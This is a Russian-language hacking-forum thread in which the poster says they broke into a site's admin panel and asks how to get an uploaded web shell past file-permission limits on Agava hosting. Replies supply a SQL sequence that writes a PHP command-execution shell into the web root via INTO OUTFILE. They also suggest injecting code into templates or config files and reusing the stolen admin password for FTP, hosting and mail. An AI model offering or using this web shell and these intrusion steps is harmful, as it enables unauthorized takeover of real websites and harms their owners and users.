как обойти chmod

народ помогите с таким вопросом! есть сайт его я взламал попал в админку в админке есть возможность добавлять файлы но! зараза выставляет chmod 0666 и когда я обращаюсь напрямую к файлу меня перекидывает на сайт хостера (агава) и пишет что права должны быть 0755 что делать вот вроде победа близка залить шелл пытался но из за этих прав все к чертям. в папку данную можно залить что угодно хоть .htaccess ( им я чтонибудь могу сделать?)

кстати тамже можно выполнить любой sql код там есть хрень для ввода sql команд

 

ни че тут не сделаешь пробуй в шаблоны код вставить или еще куда либо

 

А может дело в хостере, а?

 

CREATE TABLE `news` (`mess` TEXT NOT NULL) ENGINE = MYISAM ;
INSERT INTO `news` (`mess`) VALUES ('<?php system($_GET[cmd]); ?>');
SELECT `mess` FROM `news` INTO OUTFILE "/var/www/html/shell.php";

 

после такова запроса у shell.php права будут -rw-rw-rw-
мало вероятно что он запустится, и агава вроде не даёт привилегия File для mysql.

ТС ищи скрипты которые можно редактировать, для начала попробуй конфиг

 

php скрипту не нужны права на запуск. это же не программа... или я не прав?

 

все верно

 

ТС попробуй, можт пароль от админки к ftp/хостингу/мылу подходит = )

 

лазил на одном серваке, вот там полный пэ, так и не понял почему но скрипт с 0777 не запускался а вот с 0755 запускался как миленький

 

Ну да, сейчас, так частенько делают: залить скрипт к соседнему юзеру в папку с правами 777 можешь, а выполнить нет. Я писал про такую хрень недавно

http://forum.antichat.ru/thread90408.html

 

У меня тоже на агаве такое было,сам еле допер что проблема с правами была)
Но я смотрю,что у тебя возможностей целый вагон, думаю если очень нужен сайт, то справишься) или кидай в раздел "Админки" , там тебе быстро шелл зальют